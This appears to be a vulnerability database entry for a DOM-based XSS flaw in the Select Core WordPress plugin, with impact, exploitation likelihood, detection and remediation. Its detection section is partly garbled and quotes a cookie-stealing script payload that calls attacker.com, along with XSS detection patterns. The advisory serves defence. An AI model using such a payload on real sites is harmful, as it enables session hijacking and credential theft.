
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67539 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the Select Core WordPress plugin developed by Select-Themes. It affects all versions of the plugin prior to 2.6, allowing authenticated attackers with at least Contributor-level privileges to inject malicious scripts into web pages. The vulnerability was reported by researcher João Pedro S Alcântara (Kinorth) on October 15, 2025, published by Patchstack on November 14, 2025, and assigned a CVE on December 9, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically manifesting as DOM-Based XSS. In DOM-Based XSS, the attack payload is injected and executed entirely within the browser's Document Object Model without requiring a server-side reflection, meaning the malicious script is processed by client-side JavaScript that unsafely handles attacker-controlled input. Exploitation requires the attacker to hold at least Contributor or Developer-level privileges on the WordPress site, and successful execution also requires a privileged user to interact with the crafted content (e.g., visiting a malicious page or clicking a link). No public proof-of-concept code has been disclosed (Patchstack).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, defacement via injected redirects or advertisements, and delivery of further malicious payloads to site visitors. The scope is marked as Changed in the CVSS scoring, indicating that the impact can extend beyond the vulnerable component to affect other users or systems interacting with the site (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-67539. The EPSS score is approximately 0.039%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that XSS vulnerabilities of this type are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of individual site popularity (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to be processed by the plugin's client-side JavaScript.<script>, javascript:, onerror=, onload= patterns in URL parameters or form fields.wp-content/plugins/select-core/ directory that may indicate secondary compromise following XSS exploitation.The vendor has released version 2.6 of the Select Core plugin, which patches this vulnerability. WordPress site administrators should update the Select Core plugin to version 2.6 or later immediately via the WordPress admin dashboard or by downloading the updated plugin from the official source. Patchstack users can enable auto-update for vulnerable plugins to automate remediation. If an immediate update is not possible, restricting Contributor and Developer role access and monitoring for suspicious content submissions are recommended interim measures (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."